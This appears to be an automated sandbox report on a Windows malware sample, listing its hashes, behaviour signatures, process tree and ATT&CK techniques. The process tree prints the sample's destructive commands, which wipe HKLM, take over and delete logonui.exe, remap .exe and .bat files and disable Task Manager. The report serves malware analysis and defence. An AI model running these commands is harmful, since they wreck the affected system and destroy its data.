Analysis

  • max time kernel
    129s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    15-02-2022 11:48

General

  • Target

    82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe

  • Size

    602KB

  • MD5

    3acdcdee17825753cacc8dfd414e57d3

  • SHA1

    269fcb1ae5794190e1cecdf96b1eaa41188dc2a6

  • SHA256

    82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8

  • SHA512

    ab700397a9925958914a82d8e02dbbe6e1981980e44dbd982fed3f3d443f6610313e59810e0297ca27542e7b686c9a4340ef8fdb6ec9d24ff5e8437aa4cccd69

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs
  • Modifies system executable filetype association 2 TTPs 46 IoCs
  • Disables Task Manager via registry modification
  • Modifies Installed Components in the registry 2 TTPs
  • Possible privilege escalation attempt 4 IoCs
  • Sets file execution options in registry 2 TTPs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe
    "C:\Users\Admin\AppData\Local\Temp\82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /F %WINDIR%\system32\dllcache\logonui.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\dllcache\logonui.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2356
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKLM /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2076
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKLM /f
        3⤵
        • Modifies system executable filetype association
        • Adds Run key to start application
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Modifies registry key
        PID:2940
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /F %WINDIR%\system32\logonui.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\logonui.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4088
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\SysWOW64\reg.exe
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2052
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls %WINDIR%\system32\dllcache\logonui.exe /Grant:r %UserName% :F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3128
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\system32\dllcache\logonui.exe /Grant:r Admin :F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2724
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls %WINDIR%\system32\logonui.exe /Grant:r %UserName% :F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\system32\logonui.exe /Grant:r Admin :F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3032
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\WINDOWS\system32\dllcache\logonui.exe /s/q
      2⤵
        PID:3400
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c del C:\WINDOWS\system32\logonui.exe /s/q
        2⤵
          PID:60
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c assoc .exe=.html
          2⤵
            PID:552
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c assoc .bat=.html
            2⤵
              PID:1320
          • C:\Windows\system32\MusNotifyIcon.exe
            %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
            1⤵
              PID:3736
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k NetworkService -p
              1⤵
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              PID:2400
            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
              1⤵
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:3496

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Registry Run Keys / Startup Folder

            4
            T1060

            Change Default File Association

            1
            T1042

            Browser Extensions

            1
            T1176

            Bootkit

            1
            T1067

            Defense Evasion

            Modify Registry

            8
            T1112

            File Permissions Modification

            1
            T1222

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            2
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads